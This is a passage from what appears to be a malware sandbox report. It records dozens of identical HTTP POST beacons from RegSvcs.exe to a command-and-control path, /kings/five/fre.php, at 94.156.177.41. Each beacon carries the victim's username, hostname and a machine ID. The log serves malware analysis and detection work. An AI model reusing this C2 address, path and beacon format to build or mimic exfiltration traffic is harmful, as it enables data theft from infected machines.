                                                                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                  Host: 94.156.177.41
                                                                                  Accept: */*
                                                                                  Content-Type: application/octet-stream
                                                                                  Content-Encoding: binary
                                                                                  Content-Key: 2F83DE58
                                                                                  Content-Length: 149
                                                                                  Connection: close
                                                                                  Dec 4, 2024 06:53:04.401220083 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 34 00 39 00 31 00 36 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                  Data Ascii: (ckav.rujones549163JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                  Dec 4, 2024 06:53:05.702600956 CET193INHTTP/1.1 404 Not Found
                                                                                  Server: nginx/1.26.1
                                                                                  Date: Wed, 04 Dec 2024 05:53:05 GMT
                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  Connection: close
                                                                                  X-Powered-By: PHP/5.4.16
                                                                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                  Data Ascii: File not found.


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  32192.168.2.44979994.156.177.41807996C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 4, 2024 06:53:05.975161076 CET244OUTPOST /kings/five/fre.php HTTP/1.0
                                                                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                  Host: 94.156.177.41
                                                                                  Accept: */*
                                                                                  Content-Type: application/octet-stream
                                                                                  Content-Encoding: binary
                                                                                  Content-Key: 2F83DE58
                                                                                  Content-Length: 149
                                                                                  Connection: close
                                                                                  Dec 4, 2024 06:53:06.095983982 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 34 00 39 00 31 00 36 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                  Data Ascii: (ckav.rujones549163JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                  Dec 4, 2024 06:53:07.476594925 CET193INHTTP/1.1 404 Not Found
                                                                                  Server: nginx/1.26.1
                                                                                  Date: Wed, 04 Dec 2024 05:53:07 GMT
                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  Connection: close
                                                                                  X-Powered-By: PHP/5.4.16
                                                                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                  Data Ascii: File not found.


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  33192.168.2.44980594.156.177.41807996C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 4, 2024 06:53:07.731486082 CET244OUTPOST /kings/five/fre.php HTTP/1.0
                                                                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                  Host: 94.156.177.41
                                                                                  Accept: */*
                                                                                  Content-Type: application/octet-stream
                                                                                  Content-Encoding: binary
                                                                                  Content-Key: 2F83DE58
                                                                                  Content-Length: 149
                                                                                  Connection: close
                                                                                  Dec 4, 2024 06:53:07.851505995 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 34 00 39 00 31 00 36 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                  Data Ascii: (ckav.rujones549163JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                  Dec 4, 2024 06:53:09.330075979 CET193INHTTP/1.1 404 Not Found
                                                                                  Server: nginx/1.26.1
                                                                                  Date: Wed, 04 Dec 2024 05:53:09 GMT
                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  Connection: close
                                                                                  X-Powered-By: PHP/5.4.16
                                                                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                  Data Ascii: File not found.


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  34192.168.2.44981194.156.177.41807996C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 4, 2024 06:53:09.593000889 CET244OUTPOST /kings/five/fre.php HTTP/1.0
                                                                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                  Host: 94.156.177.41
                                                                                  Accept: */*
                                                                                  Content-Type: application/octet-stream
                                                                                  Content-Encoding: binary
                                                                                  Content-Key: 2F83DE58
                                                                                  Content-Length: 149
                                                                                  Connection: close
                                                                                  Dec 4, 2024 06:53:09.713035107 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 34 00 39 00 31 00 36 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                  Data Ascii: (ckav.rujones549163JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                  Dec 4, 2024 06:53:11.164197922 CET193INHTTP/1.1 404 Not Found
                                                                                  Server: nginx/1.26.1
                                                                                  Date: Wed, 04 Dec 2024 05:53:10 GMT
                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  Connection: close
                                                                                  X-Powered-By: PHP/5.4.16
                                                                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                  Data Ascii: File not found.


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  35192.168.2.44981694.156.177.41807996C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 4, 2024 06:53:11.517294884 CET244OUTPOST /kings/five/fre.php HTTP/1.0
                                                                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                  Host: 94.156.177.41
                                                                                  Accept: */*
                                                                                  Content-Type: application/octet-stream
                                                                                  Content-Encoding: binary
                                                                                  Content-Key: 2F83DE58
                                                                                  Content-Length: 149
                                                                                  Connection: close
                                                                                  Dec 4, 2024 06:53:11.637326956 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 34 00 39 00 31 00 36 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                  Data Ascii: (ckav.rujones549163JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                  Dec 4, 2024 06:53:12.980808020 CET193INHTTP/1.1 404 Not Found
                                                                                  Server: nginx/1.26.1
                                                                                  Date: Wed, 04 Dec 2024 05:53:12 GMT
                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  Connection: close
                                                                                  X-Powered-By: PHP/5.4.16
                                                                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                  Data Ascii: File not found.


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  36192.168.2.44981894.156.177.41807996C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 4, 2024 06:53:13.250663042 CET244OUTPOST /kings/five/fre.php HTTP/1.0
                                                                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                  Host: 94.156.177.41
                                                                                  Accept: */*
                                                                                  Content-Type: application/octet-stream
                                                                                  Content-Encoding: binary
                                                                                  Content-Key: 2F83DE58
                                                                                  Content-Length: 149
                                                                                  Connection: close
                                                                                  Dec 4, 2024 06:53:13.370848894 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 34 00 39 00 31 00 36 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                  Data Ascii: (ckav.rujones549163JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                  Dec 4, 2024 06:53:14.867993116 CET193INHTTP/1.1 404 Not Found
                                                                                  Server: nginx/1.26.1
                                                                                  Date: Wed, 04 Dec 2024 05:53:14 GMT
                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  Connection: close
                                                                                  X-Powered-By: PHP/5.4.16
                                                                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                  Data Ascii: File not found.


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  37192.168.2.44982494.156.177.41807996C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 4, 2024 06:53:15.124722958 CET244OUTPOST /kings/five/fre.php HTTP/1.0
                                                                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                  Host: 94.156.177.41
                                                                                  Accept: */*
                                                                                  Content-Type: application/octet-stream
                                                                                  Content-Encoding: binary
                                                                                  Content-Key: 2F83DE58
                                                                                  Content-Length: 149
                                                                                  Connection: close
                                                                                  Dec 4, 2024 06:53:15.244854927 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 34 00 39 00 31 00 36 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                  Data Ascii: (ckav.rujones549163JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                  Dec 4, 2024 06:53:16.678155899 CET193INHTTP/1.1 404 Not Found
                                                                                  Server: nginx/1.26.1
                                                                                  Date: Wed, 04 Dec 2024 05:53:16 GMT
                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  Connection: close
                                                                                  X-Powered-By: PHP/5.4.16
                                                                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                  Data Ascii: File not found.


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  38192.168.2.44982994.156.177.41807996C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 4, 2024 06:53:16.937107086 CET244OUTPOST /kings/five/fre.php HTTP/1.0
                                                                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                  Host: 94.156.177.41
                                                                                  Accept: */*
                                                                                  Content-Type: application/octet-stream
                                                                                  Content-Encoding: binary
                                                                                  Content-Key: 2F83DE58
                                                                                  Content-Length: 149
                                                                                  Connection: close
                                                                                  Dec 4, 2024 06:53:17.057306051 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 34 00 39 00 31 00 36 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                  Data Ascii: (ckav.rujones549163JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                  Dec 4, 2024 06:53:18.586366892 CET193INHTTP/1.1 404 Not Found
                                                                                  Server: nginx/1.26.1
                                                                                  Date: Wed, 04 Dec 2024 05:53:18 GMT
                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  Connection: close
                                                                                  X-Powered-By: PHP/5.4.16
                                                                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                  Data Ascii: File not found.


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  39192.168.2.44983494.156.177.41807996C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 4, 2024 06:53:18.845488071 CET244OUTPOST /kings/five/fre.php HTTP/1.0
                                                                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                  Host: 94.156.177.41
                                                                                  Accept: */*
                                                                                  Content-Type: application/octet-stream
                                                                                  Content-Encoding: binary
                                                                                  Content-Key: 2F83DE58
                                                                                  Content-Length: 149
                                                                                  Connection: close
                                                                                  Dec 4, 2024 06:53:18.965517998 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 34 00 39 00 31 00 36 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                  Data Ascii: (ckav.rujones549163JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                  Dec 4, 2024 06:53:20.454266071 CET193INHTTP/1.1 404 Not Found
                                                                                  Server: nginx/1.26.1
                                                                                  Date: Wed, 04 Dec 2024 05:53:20 GMT
                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  Connection: close
                                                                                  X-Powered-By: PHP/5.4.16
                                                                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                  Data Ascii: File not found.


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  40192.168.2.44984194.156.177.41807996C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 4, 2024 06:53:20.721347094 CET244OUTPOST /kings/five/fre.php HTTP/1.0
                                                                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                  Host: 94.156.177.41
                                                                                  Accept: */*
                                                                                  Content-Type: application/octet-stream
                                                                                  Content-Encoding: binary
                                                                                  Content-Key: 2F83DE58
                                                                                  Content-Length: 149
                                                                                  Connection: close
                                                                                  Dec 4, 2024 06:53:20.841367006 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 34 00 39 00 31 00 36 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                  Data Ascii: (ckav.rujones549163JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                  Dec 4, 2024 06:53:22.119246960 CET193INHTTP/1.1 404 Not Found
                                                                                  Server: nginx/1.26.1
                                                                                  Date: Wed, 04 Dec 2024 05:53:21 GMT
                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  Connection: close
                                                                                  X-Powered-By: PHP/5.4.16
                                                                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                  Data Ascii: File not found.


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  41192.168.2.44984594.156.177.41807996C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 4, 2024 06:53:22.373765945 CET244OUTPOST /kings/five/fre.php HTTP/1.0
                                                                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                  Host: 94.156.177.41
                                                                                  Accept: */*
                                                                                  Content-Type: application/octet-stream
                                                                                  Content-Encoding: binary
                                                                                  Content-Key: 2F83DE58
                                                                                  Content-Length: 149
                                                                                  Connection: close
                                                                                  Dec 4, 2024 06:53:22.493731976 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 34 00 39 00 31 00 36 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                  Data Ascii: (ckav.rujones549163JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                  Dec 4, 2024 06:53:23.990828991 CET193INHTTP/1.1 404 Not Found
                                                                                  Server: nginx/1.26.1
                                                                                  Date: Wed, 04 Dec 2024 05:53:23 GMT
                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  Connection: close
                                                                                  X-Powered-By: PHP/5.4.16
                                                                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                  Data Ascii: File not found.


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  42192.168.2.44985094.156.177.41807996C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 4, 2024 06:53:24.249197006 CET244OUTPOST /kings/five/fre.php HTTP/1.0
                                                                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                  Host: 94.156.177.41
                                                                                  Accept: */*
                                                                                  Content-Type: application/octet-stream
                                                                                  Content-Encoding: binary
                                                                                  Content-Key: 2F83DE58
                                                                                  Content-Length: 149
                                                                                  Connection: close
                                                                                  Dec 4, 2024 06:53:24.369184971 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 34 00 39 00 31 00 36 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                  Data Ascii: (ckav.rujones549163JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                  Dec 4, 2024 06:53:25.847604990 CET193INHTTP/1.1 404 Not Found
                                                                                  Server: nginx/1.26.1
                                                                                  Date: Wed, 04 Dec 2024 05:53:25 GMT
                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  Connection: close
                                                                                  X-Powered-By: PHP/5.4.16
                                                                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                  Data Ascii: File not found.


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  43192.168.2.44985594.156.177.41807996C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 4, 2024 06:53:26.109890938 CET244OUTPOST /kings/five/fre.php HTTP/1.0
                                                                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                  Host: 94.156.177.41
                                                                                  Accept: */*
                                                                                  Content-Type: application/octet-stream
                                                                                  Content-Encoding: binary
                                                                                  Content-Key: 2F83DE58
                                                                                  Content-Length: 149
                                                                                  Connection: close
                                                                                  Dec 4, 2024 06:53:26.229897976 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 34 00 39 00 31 00 36 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                  Data Ascii: (ckav.rujones549163JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                  Dec 4, 2024 06:53:27.716058969 CET193INHTTP/1.1 404 Not Found
                                                                                  Server: nginx/1.26.1
                                                                                  Date: Wed, 04 Dec 2024 05:53:27 GMT
                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  Connection: close
                                                                                  X-Powered-By: PHP/5.4.16
                                                                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                  Data Ascii: File not found.


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  44192.168.2.44986194.156.177.41807996C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 4, 2024 06:53:27.989603996 CET244OUTPOST /kings/five/fre.php HTTP/1.0
                                                                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                  Host: 94.156.177.41
                                                                                  Accept: */*
                                                                                  Content-Type: application/octet-stream
                                                                                  Content-Encoding: binary
                                                                                  Content-Key: 2F83DE58
                                                                                  Content-Length: 149
                                                                                  Connection: close
                                                                                  Dec 4, 2024 06:53:28.109935999 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 34 00 39 00 31 00 36 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                  Data Ascii: (ckav.rujones549163JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                  Dec 4, 2024 06:53:29.409584045 CET193INHTTP/1.1 404 Not Found
                                                                                  Server: nginx/1.26.1
                                                                                  Date: Wed, 04 Dec 2024 05:53:29 GMT
                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  Connection: close
                                                                                  X-Powered-By: PHP/5.4.16
                                                                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                  Data Ascii: File not found.


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  45192.168.2.44986694.156.177.41807996C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 4, 2024 06:53:29.684309006 CET244OUTPOST /kings/five/fre.php HTTP/1.0
                                                                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                  Host: 94.156.177.41
                                                                                  Accept: */*
                                                                                  Content-Type: application/octet-stream
                                                                                  Content-Encoding: binary
                                                                                  Content-Key: 2F83DE58
                                                                                  Content-Length: 149
                                                                                  Connection: close
                                                                                  Dec 4, 2024 06:53:29.804558992 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 34 00 39 00 31 00 36 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                  Data Ascii: (ckav.rujones549163JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                  Dec 4, 2024 06:53:31.273389101 CET193INHTTP/1.1 404 Not Found
                                                                                  Server: nginx/1.26.1
                                                                                  Date: Wed, 04 Dec 2024 05:53:31 GMT
                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  Connection: close
                                                                                  X-Powered-By: PHP/5.4.16
                                                                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                  Data Ascii: File not found.


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  46192.168.2.44987194.156.177.41807996C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 4, 2024 06:53:31.536389112 CET244OUTPOST /kings/five/fre.php HTTP/1.0
                                                                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                  Host: 94.156.177.41
                                                                                  Accept: */*
                                                                                  Content-Type: application/octet-stream
                                                                                  Content-Encoding: binary
                                                                                  Content-Key: 2F83DE58
                                                                                  Content-Length: 149
                                                                                  Connection: close
                                                                                  Dec 4, 2024 06:53:31.659621954 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 34 00 39 00 31 00 36 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                  Data Ascii: (ckav.rujones549163JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                  Dec 4, 2024 06:53:33.162556887 CET193INHTTP/1.1 404 Not Found
                                                                                  Server: nginx/1.26.1
                                                                                  Date: Wed, 04 Dec 2024 05:53:32 GMT
                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  Connection: close
                                                                                  X-Powered-By: PHP/5.4.16
                                                                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                  Data Ascii: File not found.


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  47192.168.2.44987594.156.177.41807996C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 4, 2024 06:53:33.423110962 CET244OUTPOST /kings/five/fre.php HTTP/1.0
                                                                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                  Host: 94.156.177.41
                                                                                  Accept: */*
                                                                                  Content-Type: application/octet-stream
                                                                                  Content-Encoding: binary
                                                                                  Content-Key: 2F83DE58
                                                                                  Content-Length: 149
                                                                                  Connection: close
                                                                                  Dec 4, 2024 06:53:33.543134928 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 34 00 39 00 31 00 36 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                  Data Ascii: (ckav.rujones549163JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                  Dec 4, 2024 06:53:35.092927933 CET193INHTTP/1.1 404 Not Found
                                                                                  Server: nginx/1.26.1
                                                                                  Date: Wed, 04 Dec 2024 05:53:34 GMT
                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  Connection: close
                                                                                  X-Powered-By: PHP/5.4.16
                                                                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                  Data Ascii: File not found.


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  48192.168.2.44988194.156.177.41807996C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 4, 2024 06:53:35.600054026 CET244OUTPOST /kings/five/fre.php HTTP/1.0
                                                                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                  Host: 94.156.177.41
                                                                                  Accept: */*
                                                                                  Content-Type: application/octet-stream
                                                                                  Content-Encoding: binary
                                                                                  Content-Key: 2F83DE58
                                                                                  Content-Length: 149
                                                                                  Connection: close
                                                                                  Dec 4, 2024 06:53:35.720159054 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 34 00 39 00 31 00 36 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                  Data Ascii: (ckav.rujones549163JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                  Dec 4, 2024 06:53:37.030312061 CET193INHTTP/1.1 404 Not Found
                                                                                  Server: nginx/1.26.1
                                                                                  Date: Wed, 04 Dec 2024 05:53:36 GMT
                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  Connection: close
                                                                                  X-Powered-By: PHP/5.4.16
                                                                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                  Data Ascii: File not found.


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  49192.168.2.44988694.156.177.41807996C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 4, 2024 06:53:37.297369957 CET244OUTPOST /kings/five/fre.php HTTP/1.0
                                                                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                  Host: 94.156.177.41
                                                                                  Accept: */*
                                                                                  Content-Type: application/octet-stream
                                                                                  Content-Encoding: binary
                                                                                  Content-Key: 2F83DE58
                                                                                  Content-Length: 149
                                                                                  Connection: close
